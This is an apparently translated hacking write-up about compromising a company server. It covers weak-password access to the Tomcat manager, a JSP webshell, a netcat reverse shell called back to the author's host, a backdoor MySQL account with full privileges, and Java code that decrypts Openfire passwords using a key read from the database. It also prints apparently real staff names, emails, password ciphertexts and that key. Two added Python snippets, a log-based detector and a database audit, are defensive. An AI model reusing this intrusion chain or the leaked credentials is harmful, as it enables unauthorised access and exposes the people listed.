The starting point is a weak password on the Tomcat /manager/html administrator page.
By the way, you can use a Google hack to search for Tomcat pages. Enter the following in the browser:

```
intitle:Apache.Tomcat "Congratulations!"
```

Here the title keywords are separated by a dot, and the text in quotes is matched against the page content.
Of course, if the /manager/html page has been removed, or the administrator has not configured an account and password for it, the management interface cannot be reached.
Upload and deploy a JSP trojan (webshell):
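As an added example (not from the original post), the defender's side of this entry point: a small parser over Tomcat access-log lines in the default common pattern that flags repeated 401s against /manager (password guessing) and any successful request to the manager's deploy endpoints. The log lines are constructed, and the endpoint list assumes the Tomcat 6/7 manager URL layout.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Manager endpoints that install a new web application (assumed Tomcat 6/7 URL layout).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/html/deploy",
                "/manager/text/deploy", "/manager/deploy")

# Constructed sample log: six failed manager logins from one address, then a
# successful login and a WAR upload as user "tomcat", plus one unrelated request.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2013:10:01:0%d +0800] "GET /manager/html HTTP/1.1" 401 2473' % i
    for i in range(6)
] + [
    '203.0.113.7 - tomcat [12/Mar/2013:10:01:20 +0800] "GET /manager/html HTTP/1.1" 200 15321',
    '203.0.113.7 - tomcat [12/Mar/2013:10:01:45 +0800] '
    '"POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 16002',
    '198.51.100.9 - - [12/Mar/2013:10:03:00 +0800] "GET /index.jsp HTTP/1.1" 200 1024',
]

def parse(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def analyze(lines, auth_fail_threshold=5):
    """Return ({ip: number of 401s on /manager}, [successful deploy events])."""
    failures = defaultdict(int)
    deploys = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]   # drop the query string (CSRF nonce etc.)
        if not path.startswith("/manager"):
            continue
        status = int(rec["status"])
        if status == 401:
            failures[rec["ip"]] += 1
        elif 200 <= status < 300 and path in DEPLOY_PATHS:
            deploys.append({"ip": rec["ip"], "user": rec["user"], "path": path, "time": rec["ts"]})
    guessing = {ip: n for ip, n in failures.items() if n >= auth_fail_threshold}
    return guessing, deploys

if __name__ == "__main__":
    guessing, deploys = analyze(SAMPLE_LOG)
    for ip, n in guessing.items():
        print("possible manager password guessing from %s: %d x 401" % (ip, n))
    for d in deploys:
        print("application deployed via %(path)s by %(user)s from %(ip)s at %(time)s" % d)
```

A burst of 401s followed by a 2xx on an upload or deploy path from the same address is exactly the sequence the post describes, and is worth alerting on even when the manager is meant to be in use.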
The usual first step in Linux privilege escalation: use command execution in the webshell to bounce back a reverse shell.
Compile the netcat source file:

```shell
gcc xiaobo.c -o xiaobo
```

Listen locally:

```shell
nc -vv -lp 12345
```

Bounce back from the JSP trojan:

```shell
./xiaobo xx.xx 12345
```

Note: sometimes the bounce fails because the file has not been made executable. Just give it full permissions:

```shell
chmod 777 xiaobo
```
First, collect system information:

```shell
lsb_release -a
```

That is, we need an exploit for Ubuntu 12.04 or for kernel 3.2.0-38.
The usual place to look is exploit-db.com.
Unfortunately, not many usable exploits turned up.
Of course, we can also look for a driver or a third-party service to escalate privileges. I have never succeeded with that.
Continue collecting server information. Use SuperScan to scan for open ports:
Using Metasploit, I tried FTP and SSH exploits and weak passwords. Fruitless.
I tried the high-numbered ports in the browser and found another Tomcat (no weak password) and a Seafile team collaboration platform.
After googling Seafile, it turned out to be an open-source "distributed file synchronization" tool developed by a Chinese team.
I studied the tool's installation and configuration carefully; it uses an embedded SQLite database. On Weibo I asked the development team where the tool saves user accounts and passwords: ccnet/peerMgr/usermgr.db. It turned out the ccnet folder was not accessible, but I still found a seahub.db that stores the account names. I opened it and had a look:
With the accounts below, weak passwords and a bit of social engineering, I logged in successfully:
We can see the company's in-progress or completed contracts, project plans, design documents and so on, so this server belongs to a software company. These things should be confidential:
First, check whether there is an upload vulnerability.
Development languages: C/C++, Python. The server also runs things I don't recognise, so I gave up on that and used the access I had to collect information.
You can see the company's member list and administrators:
Continue with social engineering:
Find the project under Tomcat and the saved MySQL password. With the root password and the webshell, I logged in to MySQL successfully. (An aside: my webshell could not connect to MySQL at first, and operations such as show databases and show tables were not supported, so I modified its source code once more.)
```
Database Connection Failed
com.mysql.jdbc.exceptions.jdbc4.MySQLNonTransientConnectionException: Cannot load connection class because of underlying exception: 'java.lang.NumberFormatException: For input string: "3306;User=root;Password=testxx;DatabaseName=mysql"'.
```
To make the data easier to view, simply enable remote connections. Let's take a look:
To protect the server I did not expose root remotely, to avoid it being picked up by batch weak-password scans.
Create a user hack with password hack that is allowed to connect remotely, and grant it all privileges:

```sql
CREATE USER hack IDENTIFIED BY 'hink';
GRANT ALL PRIVILEGES ON *.* TO hack@'%' IDENTIFIED BY 'hack';
```

Then connect with MySQL Workbench (a developer's tool, hehe).
An aside: it is said that MySQL on Linux can use the system command to escalate privileges. I connected to MySQL remotely from the Windows command line and tried the system command to add a user. I went to the MySQL official website and checked the documentation for the system function. Then I connected to MySQL remotely from the BT5 command line; the system user-add command succeeded, and the user was added to my BT5 box. You should all know what MySQL's system function means, right?
Back to the point: I want to collect all the user accounts and passwords stored in the MySQL data, and then try the Linux root password for remote FTP or SSH access.
Some of the MD5 hashes were cracked; basically weak passwords.
Highlight: the openfire database.
When I saw the name I thought it was a bit much. Google: Openfire is a real-time web-based instant messaging platform, originally Jive Messenger.
| Username | Encrypted password | Name | Email |
|---|---|---|---|
| admin | de8d41e122591e3ac5dfabf41bb8ee186cb0ec963%ae71 | Administrator | admin@family10.com |
| caifei | 0db546455b7e6a8bd1905e34028ca31704ae5cf27a65e1c2 | Cai Fei | caifei@qq.com |
| chensong | e54b7b46c4862dd1ea159a174eb1e26d6b6c1fac89a5dc73 | Chen Song | chensong@qq.com |
| liqiang | 4f21a0de9b6a32aadd0a6bd0cf53a82da4244bc85111556e | Li Qiang | liqiang4264@qq.com |
| liqing | 0d24c065be1fdd4db3dde16d39b8907fda-8a8a4a7f84c75 | Li Qing | liqing@qq.com |
| liuhuayi | 5809dadd4631e859d995d93ff0587524f75c541ab55f23c6 | Liu Huayi | liuhuayi@qq.com |
| qiulibo | 8c14fda295def40ba10bcd9b78ee869ce5a9880eaa8c6eb6 | Qiu Libo | qiubibo@qq.com |
| xuliang | ba8dc396077d18e3a5683455a92d808adb06d8ac74f31fa3 | Xu Liang | xuliang@qq.com |
| zhangxin | b88349048d4b55b91f9a942652b89cf36d75cc2e8ba2cfd6 | Zhang Xin | zhangxin@qq.com |
Decryption got stuck at step 5: the encryption type could not be identified. So the focus of this article is Openfire password decryption.
Openfire is also open-source software, and its passwords use its own algorithm.
Openfire supports secondary development, and Google turned up plenty of material, so we set up a development environment and use the decryption class Openfire itself provides.
- Openfire implements this in org.jivesoftware.util.Blowfish.java.
- The encryptString(String password) and decryptString(String encryptedString) methods of Blowfish perform the encryption and decryption.
- new Blowfish(String passwordKey) needs a passwordKey. Where does it come from?
- It turns out the ofProperty table in the Openfire database holds the passwordKey value, generated automatically when Openfire is installed.
- Each time Openfire generates a database this property differs, so if the database changes, importing the original user records is useless.
- org.jivesoftware.util.Blowfish.java can be used on its own to encrypt and decrypt.

Create a Java project in Eclipse, fetch the org.jivesoftware.util.Blowfish.java class from the official site, and import it into the project.
Write a new DecryPwd class for decryption:
```java
import org.jivesoftware.util.Blowfish;

public class DecryPwd {

    /**
     * @param args
     */
    public static void main(String[] args) {
        String resultPWD = null;
        String passWordKey = "566251afC9Lk39w"; // passwordKey, read from the openfire database
        Blowfish blowFish = new Blowfish(passWordKey); // initialise with the encryption key
        resultPWD = blowFish.decryptString("de8d41e122591e3ac5dfabf41bb8ee186cb0ec963%ae71");
        System.out.println(resultPWD); // print the result
    }

}
```
Run it: decryption succeeded!
Then I took the account and password and went in over SSH. That is the whole process.
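As an added example, not code from the post or from Openfire: an audit of the two tables the whole Openfire section turns on. It builds an in-memory SQLite stand-in for ofProperty and ofUser (an assumed column subset of Openfire's schema; the real deployment kept them in MySQL) and lists every account whose password a stolen copy of the database gives away: plainPassword rows, plus encryptedPassword rows whenever passwordKey is stored right next to them.

```python
import sqlite3

# Constructed in-memory stand-in for the two Openfire tables the post uses;
# the column subset is an assumption based on Openfire's ofUser/ofProperty.
SCHEMA = """
CREATE TABLE ofProperty (name TEXT PRIMARY KEY, propValue TEXT);
CREATE TABLE ofUser (username TEXT PRIMARY KEY, plainPassword TEXT,
                     encryptedPassword TEXT, name TEXT, email TEXT);
"""
SAMPLE_PROPERTIES = [("passwordKey", "CONSTRUCTED_KEY_not_real"), ("xmpp.domain", "example.test")]
SAMPLE_USERS = [
    ("admin", None, "00" * 24, "Administrator", "admin@example.test"),   # Blowfish blob, key in ofProperty
    ("legacy", "Passw0rd", None, "Legacy User", "legacy@example.test"), # never migrated off plainPassword
    ("ldapuser", None, None, "LDAP User", "ldap@example.test"),         # authenticated elsewhere
]

def build_sample_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO ofProperty VALUES (?, ?)", SAMPLE_PROPERTIES)
    con.executemany("INSERT INTO ofUser VALUES (?, ?, ?, ?, ?)", SAMPLE_USERS)
    return con

def audit(con):
    """List which accounts a stolen copy of this database exposes, and why."""
    key_row = con.execute("SELECT propValue FROM ofProperty WHERE name = 'passwordKey'").fetchone()
    plain = [r[0] for r in con.execute(
        "SELECT username FROM ofUser WHERE plainPassword IS NOT NULL ORDER BY 1")]
    enc = [r[0] for r in con.execute(
        "SELECT username FROM ofUser WHERE encryptedPassword IS NOT NULL ORDER BY 1")]
    # Reversible encryption is only obfuscation when the key sits in the same database:
    # anyone who can read ofUser can read ofProperty too, so those rows count as exposed.
    exposed = set(plain) | (set(enc) if key_row else set())
    return {
        "password_key_in_db": key_row is not None,
        "plaintext_users": plain,
        "reversible_users": enc,
        "exposed_users": sorted(exposed),
    }

if __name__ == "__main__":
    report = audit(build_sample_db())
    for k, v in report.items():
        print("%-20s %s" % (k, v))
```

The fix for this class of finding is a one-way salted hash rather than a better hiding place for the key; newer Openfire releases store SCRAM-SHA-1 verifiers in additional ofUser columns, so an audit of a current install should check those as well.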